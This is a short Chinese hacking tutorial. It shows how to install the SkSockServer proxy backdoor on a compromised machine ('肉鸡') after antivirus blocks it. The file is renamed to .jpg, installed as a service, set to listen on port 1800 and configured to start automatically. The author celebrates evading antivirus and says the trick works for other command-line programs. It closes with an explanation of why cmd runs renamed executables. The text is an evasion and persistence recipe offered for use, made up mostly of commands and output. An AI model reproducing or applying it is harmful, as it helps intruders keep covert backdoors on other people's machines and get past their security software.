巧妙利用扩展名让我们的木马躲过杀毒软件与防火墙
我在肉鸡CMD下安装一个代理跳板后门。
执行:
E:\>SkSockServer -install
显示“拒绝访问”。
原因是被肉鸡上的杀毒软件拦截了!
怎么办?如何绕过杀毒软件或者防火墙?我把SkSockServer.exe改成SkSockServer.jpg,然后执行。
E:\>SkSockServer.jpg -install
Snake SockProxy Service installed.
E:\>SkSockServer.jpg -config port 1800
The Port value have set to 1800
E:\>SkSockServer.jpg -config starttype 2
The New StartType have set to 2 -- Auto
E:\>net start skserver
Snake SockProxy Service 服务正在启动 .
nake SockProxy Service 服务已经启动成功。
Ok!成功!
现在我们不怕杀毒软件了!而其他的在命令行执行的程序也可以用这种方法。
原理讲解:
其实原理很简单,我们利用了cmd判定文件类型的方法。在CMD中,系统首先判定文件的类型是否是执行文件,判定方法不是文件扩展名,而是文件头的PE段。如是执行文件,则执行它。如不是,再根据相应的关联启动相应程序。如没有输入扩展名,则系统将默认扩展名为BAT,EXE,COM,依次判定。也就是说,程序更改了扩展名后,只有cmd.exe能“认”出它来,因为cmd不是根据扩展名来判定文件类型的。而Windows是靠扩展名来判定文件类型的。这样,我们就可以骗过Windows和杀毒软件。